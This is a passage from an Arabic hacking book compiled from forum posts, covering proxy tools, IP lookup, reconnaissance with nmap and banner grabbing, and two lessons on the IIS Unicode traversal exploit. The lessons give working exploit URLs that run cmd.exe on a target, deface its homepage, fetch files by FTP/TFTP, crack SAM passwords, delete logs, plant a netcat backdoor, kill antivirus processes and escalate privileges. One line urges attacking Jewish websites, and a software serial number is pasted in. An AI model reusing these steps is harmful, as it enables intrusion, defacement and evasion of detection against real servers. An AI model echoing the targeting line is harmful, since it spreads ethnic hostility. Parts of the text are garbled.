والحقيقة أحمد ال الذي ذكرني بهذا البرنامج المميز وهو الذي يوضح لك كل المعلومات التي سجلتلمراقبتك أناء عملك على نظامك .

بالطبع كلكم تعلمون أن مايكروسوفت معروفة بطبعها التجسسي ... فأقدم لكم هذا البرنامج لكي تعرفوا كل ما تم تسجيله عنكم ول تنسوني من دعوة ... لني متأكد ان الكم الهائل

من المعلومات المرسلة والتقارير عنك وعن غيرك منتظمة وخفية ولكن آن لها أن تفضح ...Proxy Log Analyzerاسم البرنامج :

صورة :

بدون ضغطMB 1.07للتحميل : http ://www.mechanicalminds.com/software/pla/setup.exe

ZIP archive instructions 818 kb

http://www.mechanicalminds.com/software/pla/pla.zip

ناهيك عن أن المتصفح يسمح لك بتعبئة البيانات كما تحب .Provides a space for you to type the address and port number of the

proxy server you want to use to gain access to the Internet over HTTP, Secure, FTP, Gopher, and Socks protocols.

106

Page 107: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

فقط استخدام العدادت المتقدمة للتصال :

حتى اليبي بالماسنجر بامكانك ترسل كل ملفاتك بل حصول أي انسان على اليبي الحقيقي لك .والطريقة سهله ... اذهب افتح الماسنجر من قائمة ادوات خذ خيارات .

107

Page 108: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

انتهى،،،

الذي يجعلك تتصفح النت متخفيا!!"HTTP Port"برنامج

<ةةةةة ةة ةةةةة ةةة ةةة>

<ةةةةةة:ةةةةةة>

اسم البرنامج:------------------------

HTTPort 3snf------------------------

الوظيفة:------------------------

برنامج لتصفح بسرية وأمانفي النترنت

ويريحك من البروكسيات الرقمية

ومن البحث عنها

,,,,,,,,,,,,------------------------

وصلة التحميل------------------------

http://www.angelfire.com/tv2/ssdd63/httport3snf.zip------------------------

الشرح:-------------------------

الشرح قام بشرحه أخي العزيزFAHAD

ال يخليه ماخلى شي من خبراته إل وطرحه

نــقـــــول بســــم ال

الشكل الول

108

Page 109: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

واجهة البرنامج الرئيسية أضغط على الختيار الثالث فوقPort mapping

الشكل الثاني

Addأضغط على الختيار سوف تضاف قائمة مثل التي في الشكل أسمها

New mappingلين الحين كل شي تمام

الشكل الثالث

109

Page 110: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

هنا ياطويل العمر تكتب نفس الكلم والرقام المكتوبة زي كذاLocal port : 80

Remote host : webcache.bt.netRemote port : 3128

OKY MAN

الشكل الرابع

Proxyالن عد للختيار الثاني فوق واكتب مكان الرقم واحد البروكسي الصلي لشتراكك

سمعت ,,, الصلي

110

Page 111: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ومكان الرقم أثنين المنفذوفي الخير ضغطه قوية على الزر

Startماخلصنا بقى الخطوة الخيرة

الشكل الخامس

من خيارات النترنت127.0.0.1ضع البروكسي

80والمنفذ

والحين روح للمتصفح وأدهر بكيفكوكيف نفسك بنفسك وما عليك رقيب إل ال عزوجل..

انتهى،،،

111

Page 112: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" NeoTrace" شرح برنامج

<ةةةةة>

>DarK_HaCKeR<ةةةةةة:

برنامج يكشف كل شي عن صاحب اليبي مرحبا شباب ..

هاذا برنامج ممتاز للكشف عن معلومات الشخص و بلده و كل شيء بس بمجرد معرفة اليبي ماله .. او تريدتعرف معلومات عن موقع معين ..

اسم البرنامج .. Neo Trace Express

اتفضلوا الوصلة .. http://www.neoworx.com/download/NTX325.exe

112

Page 113: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

113

Page 114: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

اتمنى ان الشرح وافي وهذا هو السيريل نمبر : XDQG-2ZKN-X2PA-KTRQ

انتهى،،،

114

Page 115: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" كيفية القيام بجمع المعلومات عن موقع أو شبكة "

<ةةةةة ةة ةةةةة ةةةةة>

<ةةةةةة: ةةةةةة>

طرق جمع المعلومات لي موقع أو سيرفر أو شبكة أيا كانت :

=(الطريقة الولى)=^^^^^^^^^^^^^^^^^^^

وهي من خلل زيارة موقع http://www.netcraft.com/

وتكتب الموقع هناك وراح يعرض لك معلومات تفيدك كثير^^^^^^^^^^^^^^^^^^^

=(الطريقة الثانية)=^^^^^^^^^^^^^^^^^^^

وهي قديمة تستخدم حديثا لكني لادري مدى عملها ولنفرض الموقع الي نبي نجيب معلومات عنه هوhttp://www.almodammer.com/

نقوم بإرسال رسالة ليميل وهمي وغير موجود مثلdfl;kjgk'[email protected]

الخاص بالرسالة راح تلقيHeadersوبعد ارسال رسالة ليميل وهمي راح تستقبل رد ولما تعرض الـمعلومات عن الموقع

^^^^^^^^^^^^^^^^^^^

=(الطريقة الثالثة)=^^^^^^^^^^^^^^^^^^^

Bannersالـماهو البانر؟

البانر وباختصار شديد هي الرسائل التي تأتيك عندما تنفذ أمر ما يعني الرد..وكيف راح نستغلها في كشف معلومات الموقع؟

عميل التلنت والطريقة هي أن تقوم بالتصال بأحد المنافذ سواء كان Telnet Clientعن طريقة أداة FTP 21

أوTELNET 23

^^^^^^^^^^^^^^^^^^^

=(الطريقة الرابعة)=^^^^^^^^^^^^^^^^^^^

HTTPوهي Hyper Text Transfer Protocol

8080 - 80ويعمل على المنفذ وبعدين نكتب المر التاليTelnet عن طريق 80ألحين نتصل على المنفذ

GET /qwe HTTP/1.1400بعد كذا راح يخبرنا البانر بوجود صفحات الخطأ

وراح تجيك معلومات هائلة عن الهدفوفيه عندك امر ثاني وهو:

HEAD 127.0.0.1 HTTP/1.1تقوم بتنفيذه ...

^^^^^^^^^^^^^^^^^^^

115

Page 116: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

=(الطريقة الخامسة)=^^^^^^^^^^^^^^^^^^^

أو للموقع ويقوم باستقبال الردود وبسرعة هائلة ip الذي يقوم بإرسال عدة طلبات للـpingوهي من أمر الحين كيف نستفيد منها في تحديد معلومات للموقع !

حيث تقوم بوضع التاليping ipsite

ipsite الي بي الخاص بالموقع =وراح يطلعلك عدة اسطر حنا مايهمنا ال كلمة

TTL=XXXXXXالقيمة والعدد الي طلعلك=

بتقولي وش فايدته أقولك من خلله يمكن تحديد نظام التشغيل وهذي امثلة:Windows 9x/NT Intel 32

Windows 9x/NT Intel 128 Windows 2000 Intel 128 DigitalUnix 4.0 Alpha 60 Unisys x Mainframe 64

Linux 2.2.x Intel 64 FTX(UNIX) 3.3 STRATUS 64

SCO R5 Compaq 64 Netware 4.11 Intel 128

AIX 4.3.x IBM/RS6000 60 AIX 4.2.x IBM/RS6000 60

Cisco 11.2 7507 60 Cisco 12.0 2514 255

IRIX 6.x SGI 60 FreeBSD 3.x Intel 64

OpenBSD 2.x Intel 64 Solaris 8 Intel/Spar 64

Solaris 2.x Intel/Sparc 255وقد يحدث اختلف في القيم حيث يكون الفرق يساوي واحد

1 تنقص بـTTL حيث أن Nodes (حزم او قائمة بيانات) بـdata list or packetأي: عند مرور فهو خاص باليونكسtraceroute في الويندوز أما tracertلذلك عليك ان تستعمل أمر

وهو امر خاص بعرض معلومات عن الشخص أو الموقع ويمكننا استخدامه بهذه الطريقة

tracert ipip عنوان الموقع أو السخص =

^^^^^^^^^^^^^^^^^^^

=(الطريقة السادسة)=^^^^^^^^^^^^^^^^^^^

عن طريقة الدوات والبرامج لنه السهل Windowsأول

يمكنك تحديد معلومات عن الموقع والسيرفر او المنافذ المفتوحة من قبل تطبيق اي برنامج ويمكنك استغللالمنافذ بكثير من عمليات الختراق وسوف نطرق لها في الدرس الثاني

تعرفون ان الويندوز مليان برامج لكن تعرفون ان مو كل برنامج مثل أي برنامج عشان كذا راح اذكر الفضل:

N-Stealth(لتحديد معلومات عن الشبكة منها المنفذ ثغرات ...الخ) =============

Shadow Sceurity Scannerمن أفضل برامج البحث عن المنافذ والتطبيقات والعمليات ومعظم(

116

Page 117: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

الثغرات مع وجود شرح لكيفية علجها)=============

SuperScanبرنامجي المفضل فأنا استخدمه لختراق المواقع والجهزة حيث يساعدني كثيرا في معرفة( كبيرة يمنك الضافة عليها كيفما شئت)Listالمنافذ المفتوح بالموقع والجهزة ويحتوي على

-------------------------------------------------------------------------Linuxالحين نجي على

هو برنامج واحد مفضل وأكثر مستخدمين ليونكس يشهدون بجدارته والذي يحمل اسمNmap

(مستكشف الشبكات)Network Maperاختصار لـ وهو خاص للمتهمينLinuxوطبعا يفوق كل ادوات ويندوز وطرق ويندوز علشان كذا دائما ينصح بـ

باختراق الشبكات/المواقع/السيرفراتكيفية استمعاله :

وراح تجد الكثير من الوامر الذي ظهرت مثل/nmapشغل ]l] Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options [

Some Common Scan Types ('*' options require root privileges(- *sS TCP SYN stealth port scan (default if privileged (root((

-sT TCP connect() port scan (default for unprivileged users(- *sU UDP port scan

-sP ping scan (Find any reachable machines(- *sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only(

-sR/-I RPC/Identd scan (use with other scan types(Some Common Options (none are required, most can be combined:(

- *O Use TCP/IP fingerprinting to guess remote operating system-p ports to scan. Example range: '1-1024,1080,6666,31337'-F Only scans ports listed in nmap-services-v Verbose. Its use is recommended. Use twice for greater effect.-P0 Don't ping hosts (needed to scan http://www.microsoft.com/ and

others(- *Ddecoy_host1,decoy2[,...] Hide scan using many decoys

-T General timing policy-n/-R Never do DNS resolution/Always resolve [default: sometimes

resolve[-oN/-oX/-oG Output normal/XML/grepable scan logs to -iL Get targets from file; Use '-' for stdin

- *S /-e Specify source address or network interface--interactive Go into interactive mode (then press h for help(

Example: nmap -v -sS -O http://www.my.com/ 192.168.0.0/16 '192.88-90'*.*.

SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

وأيضا يحتوي العديد من الوامر المجهولة !!!!!!!!! الخاص بالبرنامج..man pageولخلفية ومعلومات اكثر قم بالذهاب إلى

لنشرح أهم أمر وهو nmap -sS -O -vv almodammer.com

almodammer.comالموقع المراد فحصه=وراح يعرض لك معلومات هائلة تفوق معلومات برامج وأدوات ويندوز

منها المنافذ والصدار والملقم والسيرفر .......^^^^^^^^^^^^^^^^^^^

=)الطريقة السابعة)=

117

Page 118: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

^^^^^^^^^^^^^^^^^^^ حتى تقدر تطبق اوامر اليونكس في الويندوز لكنShell Account أو Linuxتعتمد على وجود جهازك

لزم يكون ممتاز وسعره مناسب علشان كذا لتتعب نفسك وركبShell أفضل لن Linuxلو تركب Linuxوارتاح

whoisالمهم هذا أمر والويندوز كبرامج كبيرة وثقيلة وغير دقيقة Linuxوالي يوفره لنا

ولمعلومات أكثر اضف المرman whois

-------------------------------------------------------------------googleأما عن طريق الويندوز فيمكنك البحث في

http://www.google.com/search?q=whois&btnG=Google+Search تقوم بالبحث عن الموقع بإحدى الطرق التيcgiوالكثير من المواقع تقدم هذي الخدمة وهي سكربتات و

الطريقة الولى..............netcraftذكرتها مع اختلف بسيط وهي شبيهة بموقع

انتهى،،،

118

Page 119: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

برنامج عمران سكان للبحث عن الثغرات ""

<ةةةةة ةة ةةةة ةةةةةةةةةة>

<P @ LH@CKERZ <ةةةةةة:

برنامج عمران سكان يعتبر من أفضل برامج كشف الثغرات و ذلك لما يتميز به من سرعه سهولة في تغيير .ملف الثغرات

اسم الموقع المراد البحث عن ثغرات فيه 1 ://httpو ل تنسى ملحظه :

ل تضع \ في نهايه الموقع مثل http://www.XXX.com/

لنه سيضع من عنده / عند تطبيق الثغره

اسم ملف الثغرات 2

لتغيير ملف الثغرات إلى ملف آخر 3

الثغرات الموجوده في الملف 4

119

Page 120: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

لبدء الفحص 5

لليقاف 6

شاشة العمليات الجاريه من فحص الثغرات على الموقع 7

الثغرات الموجوده على الموقع التي نجح اختبارها 8

لمسح شاشه العمليات و النتائج لعاده البحث مره اخرى على ثغرات اخرى 9

ال 10

منفذ ال 11

11 10ملحظ : اذا ما عرفت ال فيجب عليك مسح البيانات

للخروج 12

ملحظه هامه : ل تنسو المواقع اليهودية التي تنتظر من يخترقها فأرجو عدم استخدامه ضد الموقع العربية او السلمية.

انتهى،،،

120

Page 121: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

الختراق عن طريق اليونيكود (الجزء الول) ""

<ةةةةة>

>sNiper_hEx <ةةةةةة:

نقطة ) وهي كما يلي :-13يحتوى الدرس الول على ( تعريف باليونيكود .-تاريخ ظهور هذه الثغرة .-كيفية ايجاد هذه الثغرات .-كيف يتم استغلل ثغرات اليونكود .- .CMDالوامر المستخدمة بواسطة ملف -طريقة تطبيق هذه الثغرات .- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ-

ECHO. لتاحة امكانية الكتابة على الملفاتCMD الـطريقة نسخ ملف -.

والحلول المتبعة لها .Access Deniedكيفية معرفة مشكلة الـ - .FTPكيفية عمل اكاونت للدخول بواسطة الـ-طريقة كشف باسورد الدمينستريتور .- تغيير الصفحة الرئيسية للموقع وعملية الب لوود بواسطة-

.TFTPبرنامج مسح ملفات اللوق حتى ل يتم التعرف عليك .-

121

Page 122: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ددددد دددددددددد .- IIS4.0 / IIS5.0اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع

.NT4 / Win2kوالذي ياتي عادة مع

ددددد دددد ددد دددددد .- anonymousليوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول

personوقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن ليوجد مايثبت صحة هذا الكلم ، لهذه الثغرات ، فتم استغلل هذه الثغرات من قبل المخترقين وتطوير البرامج اللزمة لها .

ددددد ددددد ددد ددددددد .-يتم ايجاد هذه الثغرات بطريقتين :-

بواسطة البرامج اللزمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي-1تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .

بواسطة تطبيق الثغرة على الموقع مباشرة .-2

ددد ددد ددددددد ددددد دددددددد .- بفك شفرة اليونكود في المثال الخطاءCMD يبدا ملف IIS4 / IIS5عند تطبيق الثغرة على نظام الـ

ومن هنا يتم استغللها .

. CMD ددددددد ددددددددد دددددد ددد- وهي امر لنشاء دليل جديد وامر للغاء دليل وامر النسخCMDالوامر المستخدمه بواسطة ملف الـ

وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أيملف وامر لسحب أي ملف ، وهي حسب المثلة التالية :-

../..http://www.xxxx.com/msadc/..%c0%af : دليل جديدانشاءامر %c0%af../winnt/system32/cmd.exe?/c+md+c:\hEx

../..http://www.xxxx.com/msadc/..%c0%af : دليلالغاءامر %c0%af../winnt/system32/cmd.exe?/c+rd+c:\hEx

ا تمام من الملفات والمجلدات للمعلومية:ليمكن الغاء أي دليل ال اذا كان فارغ

للنسخالمر المستخدم :http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe

للنقلالمر المستخدم :http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+move+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe+c:\

للحذفالمر المستخدم : http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:\hEx.mdb

../http://www.xxxx.com/msadc : الملفاتلتغيير مسمىالمر المستخدم %c0%af../winnt/system32/cmd.exe?/c+ren+c:\index.htm+hEx.htm

../..http://www.xxxx.com/msadc/..%c0%af : الملفلرؤية محتوياتالمر المستخدم %c0%af../winnt/system32/cmd.exe?/c+type+c:\hEx.txt

: داخل أي ملفللكتابةالمر المستخدم http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.txt

: أي ملفلعملية سحبالمر المستخدم

122

Page 123: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ل بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف عليك القيام او:في اخر العنوان كالتاليhttp://www.xxxx.com/msadc/hEx.mdb

ددددد ددددد ددد ددددددد .-تطبيق الثغرة على الموقع من خلل المتصفح تتم حسب المثلة التالية :-

http://www.xxxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c\:http://www.xxxx.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c\:http://www.xxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c\:http://www.xxxx.com/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c\:http://www.xxxx.com/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c\:http://www.xxxx.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c\:http://www.xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir +c\:

وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin

ددددد دددددد دددد ددددددددد ددد ددددد دد ددددد ددد- . ECHO ددد

في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذهالثغرة :-

http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c\:

والمر يكون بهذهinetpub\scripts الى مجلد w3svc.exeفنحتاج الى نسخ ملف الطريقة :-

http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3svc.exe

، الن نقوم بتصفح الموقع منinetpub\scripts الى مجلد w3svc.exeبعد نسخ ملف خلل الثغرة بهذه الطريقة :-

http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c\: للموقع الذي غالبا الن نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي

الدليل مايكون في هذاinetpub\wwwroot\index.htm -: بحيث يكون المر بالشكل التالي

http://www.xxxx.com/scripts/w3svc.exe?/[email protected]+>+c:\inetpub\wwwroot\index.htm

دددددد ددددددد ددددددد ددد CMD ـــ ددددد ددد ددد -ددددددد .

وهو لعطاء امكانية للكتابة داخل السيرفر في بعض الحالت ويتم نسخهCMDالغرض من نسخ ملف الـالى مجلد السيكربت بهذه الطريقة :-

http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe

الجديد في الثغرة بدل من الول بهذا الشكل :-CMDالن بامكاننا استخدام ملف الـhttp://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd1.exe?c+dir+c\:

ددددددد ددددددد ددد . Access Denied - ددددد ددددد ددددد ددد من خلل المحاولة في حذف أي ملف من أي امتداد ، فعندAccess Deniedتتم معرفة مشكلة الـ

فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكمAccess Deniedظهور رسالة الـ اكثر على السيرفر :-

فسوف يتاح لكCMD1 الى دليل السيكربت بمسمى CMDالطريقة الولى نسخ ملف الـ -1 باستخدام هذا المر :-Copyامكانية الكتابة باستخدام المر

123

Page 124: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe

والطريقة كما يلي :-ssinc.dllالطريقة الثانية بالتعامل مع الملف -2o اول انشاء صفحة باسمtest.shtml

o تكون هذه الصفحة داخل مجلدwwwroot/hEx/test.shtml

o#--!> كتابة هذا الكود داخل الصفحةinclude file="AAAA[...]AAبحيث ان <--" حرف .2049 يتم كتابتة حتى يتعدى Aحرف

o الن يتم طلب الصفحة من خلل المتصفحhttp://www.xxxx.com/test.shtml

o. الن سوف تظهر لك الصفحةoالن تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied. o فمعناها انك لم تقم بتطبيق الطريقة500اذا ظهرت لك صفحة الخطاء رقم

بالشكل الصحيح وعليك اعادة المحاولة . بحيث يتم عمل اب لوود لهذا الملف داخل مجلدNC.exeالطريقة الثالثة باستخدام برنامج -3

Temp في دليل الويندوز ومنه يتم تنفيذ الوامر من خلل موجة الدوز وللمعلومية مجلد الـTempالـ

مفتوح لعمليات الب لوود . الطريقة الرابعة وهي من خلل عمل كراش للسيرفر باستخدام البرامج اللزمة لهذا-4

الغرض وهذه الطريقة غير مجديه في كثير من الحيان . ونسخها الى مجلدroot.exe ، sensepost.exe ، shell.exe ، w3svc.exeالبحث عن ملفات : -5

c:\inetpub\scripts. وتطبيق الثغرة من خللها

. FTP ددددد ددد دددددد دددددد دددددد ددد- حتى يتم الستفادة من ثغرةShell.exe باسم Scripts الى مجلد CMDنسخ ملف -1

قديمة /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe

open وكتابة فيه التالي Echoبواسطة المر mspft.pllانشاء ملف -2ftp.host.comحيث ان هذا هو الخادم للـ FTP.

/c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl

الى نفس الملف الذي قمنا بانشاءهAnonymousالن مطلوب اضافة مجهول -3mspft.pll

/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl

الى نفس الملف الذي قمنا بانشاءه [email protected] الن مطلوب ادراج البريد-4mspft.pll

/shell.exe?/[email protected]+>>+c:\winnt\mspft.ppl

mspft.pll لزوم الملف الذي قمنا بانشاءه Anonymous قبل Userإضافة -5/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl

تكرار لحاجة العداد الن -6/shell.exe?/[email protected]+>>+c:\winnt\mspft.ppl

g. يتم هنا ادراج الموقع الحالي للملفات/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl

ثمGet index.htm وهي FTP اللزمة لسحب الملف من خادم الـFTPالن يكتب اوامر الـ-8يدرج هنا بدون المسج السابق

/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl

Quit هنا نفس السابق ولكن باضافة-9/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl

” وهو عبارة عن خطوات قمنا بانشاءهاFTP.exe?+"-s:c:winnt\mspft.pplالن يتم تنفيذ امر -10 باحتوائها على مايلي :-mspft.pplوموجودة في ملف

-Open FTP.host.com

-Anonymous

[email protected]

-User Anonymous

124

Page 125: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

[email protected]

-Get index.html

-Quit

/ msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"

ددددد ددد دددددد دددددددددددددد .- وهي لزوم تنفيذ بعض ) Microsoft Access – L0phtCrack( نحتاج الى وجود برنامجين

الخطوات لتالية وهي :-\ في دليل ._SAM باسورد الدمينستيتور للسيرفر يكون موجود في ملف الـ-

winnt\repair\ شفرة الباسورد هو برنامج برنامج لفك وافضل L0phtCrack كما هو موضح بالشكل التالي:-

اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في-ونستطيع تحديد مسار هذا الملف من خلل الريجستري بواسطة هذا المفتاح :- PASSFILT.DLL ملف

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL

للوصول الى البيانات منASPاذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ - ) للوصول الى باسورد htr+. ( فسوف نحتاج الى تطبيق ثغرةMySQLخلل قاعدة الـ

المسئول عن هذة القاعده وهي كالتالي :-http://www.xxxx.com/default.asp+.htr

عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة وقراءة محتوياته للعثور على اسم database.inc صحيحة وماعلينا فقط سوى سحب ملف

المستخدم والباسورد للمسئول عن قاعدة البيانات .

ددددد دددددد دددددددد دددددد دددددد دددد دددد- . TFTP دددددد دددددد

:\ c على الـ index.htmقم بانشاء صفحة وضع شعارك عليها واحفظها باسم -1 ونفذ المر في الفقرة التالية .TFTPقم بتشغيل برنامج -2

125

Page 126: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm

tftp.exe وهو البرنامج اللزم لعمل الب لوود ويجب ان يكون شغال في حالة تنفيذ المر

-"i" وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات

1.1.1.1 رقم اليبي الخاص بك

GET وهو المر اللزم لطلب الملفات مابين الرسال والستقبال

index.htm اسم الملف بجهازك

\inetpub\wwwroot\ اسم الدليل في السيرفر

index.htm اسم الملف على السيرفر

ددد ددددد ددددد ددد دد ددد دددددد دددد .- بواسطة المر :-System32 من مجلد Logوتتم هذه العملية من خلل حذف ملفات الـ

/c+del+c:/winnt/system32/logfiles/*.log

انتهى ،،،

الختراق عن طريق اليونيكود (الجزء الثاني) ""

126

Page 127: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة>

في الدرس الول كان عبارة عن اوامر اساسية يستطيع الجميع تطبيقها .. اما في هذا الدرس فالمر يتطلببعض الذكاء والمهارة ..

البداية : --------------

cmd1 الى cmdعند وجود موقع مصاب بثغرة ما (يونيكود) فان اول شي عليك القيام به هو نسخ مجلد بهذه الطريقة :

C+copy+c:\winnt\system32+c:\winnt\system32\cmd1.exe والسبب هو تفعيل امر الكتابة Echo ..

( هذا شي يعرفه الجميع ) لكن للتذكير فقط ! CMD1.exeوبعد ذلك نفذ الثغرة من الملف الجديد

الن عند تصفحك لملفات الموقع من المتصفح .. من خلل هذه الثغرة فانه سيكون لديك صلحياتIWAM_USER وهذا المستخدم هو عبارة عن يوزر ينتمي للمجموعه Guestوهو اليوزر المسؤوول .IISعن تشغيل سيرفر

فهو ل يملك صلحيات كثيرة !! ال اذا تم اعداده بشكل سيء :) Guestوبما انه من مجموعة

Microsot اما في nixليوجد شي اكثر ادمانا من محاولة الحصول على رووت :) هذا في انظمة * ليس بالسهولة التي تتوقعها :)Administratorفالوضع مختلف :) فإن محاولة الحصول على صلحيات

فرفع المتيازات بشكل محلي في انظمة مايكروسوفت ممكن فقط بطرق قليلة ل يتعدى عددها اصابع اليد الواحده .. وانا اكتب هذا الموضوع لشرح كيفية احكام السيطرة على السيرفر والحصول على حساب مكافيء

للمدير :) والتمتع بجميع موارد النظام ..

+ الملفات المطلوبة : Sechole.exe. وملحقاتها

Kill.exe Tlist.exe

ncx99.exe tftpd32.exe

جهز العده :) .. لتوفير الوقت جمعتها في مجلد واحد هنا

الن سأشرح عمل كل اداة :

1 - Sechole(بشكل مبسط) وهو اقوى استثمار موجود لرفع المتيازات بشكل محلي .. وطريقة عمله بأنه يعتمد على صدع في نواة ويندوز ان تي .. يستطيع من خلله اغتصاب عملية تابعه لمدير النظام يقوم

من خللها برفع امتيازاتك :) .

2 - Tlistتقوم بعرض جميع العمليات التي تعمل بالخلفيه .. والفائده منها هو اقفال الفايروول + النتي فايروس :)

3 -Kill.exe. عملها متمم للداة السابقة حيث ستقوم باقفال رقم العملية المستخرج من الداة السابقة 3 -NCX99 نسخه مطورة من الباكدوور NC 99 ينصت على المنفذ 4 -TFTP32.exe .. لنقل الملفات الى السيرفر

127

Page 128: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

كل ما سبق كان عبارة عن مقدمه :) اما العمل الحقيقي سيبدأ الن :

اول قم برفع جميع الدوات السابق الى السيرفر .. بهذا الشكل مثل : ncx99.exeثم قم بتشغيل

http://target/scripts/..À¯../winnt/system32/cmd1.exe?/c+C:\ncx99.exe ..99بعد ذلك قم بالتصال بالموقع على البورت

.Guest بدون امتيازات = CMDستحصل على سطر اوامر PID .. ستعرض لك جميع العمليات التي تعمل .. قم بالبحث عن رقم العملية TLISTالن قم بتشغيل الداة

الخاص بالنتي فايروس ان وجد .. وكذلك اذا وجدت جدار ناري .. الخاص بالنتي فايروس والفايروول على ورقه جانبيه .. PIDسجل رقم

تضع رقم العملية :) PID .. مكان KILL.exe PID بهذا الشكل : Killالن قم بقتل الجراء بالداة يسأل البعض ! مالهدف من اقفال النتي فايروس ؟ الجابة .. أن التحديثات الخيرة من انتي فايروس تتعامل

على انه باكدور .. والن بعد اتمام العمليات السابقة بنجاح .. قم بتشغيلSecholeمع Sechole.exe. من المتصفح (:

..Administrators الى مجموعه IWAM_USERعندها سيتم رفم امتيازات .Access Denidedالن بإمكانك تنفيذه جميع الوامر بكامل الحريه وبدون اي مشاكل في الصلحيات

وطبعا اهم شي الكتابة على الصفحه الرئيسية بامر اليكو :C+Echo+Hacked+by+XDeMoNX+

+ <C;\inetpub\wwwroot\index.htm

ولكن ليس هذا كل شي .. القراصنه الذكياء ل يبحثون فقط عن تغيير الصفحه الرئيسية خصوصا اذا كان الموقع مهم او يحتوي على

معلومات او قواعد بيانات ... إلخ :)

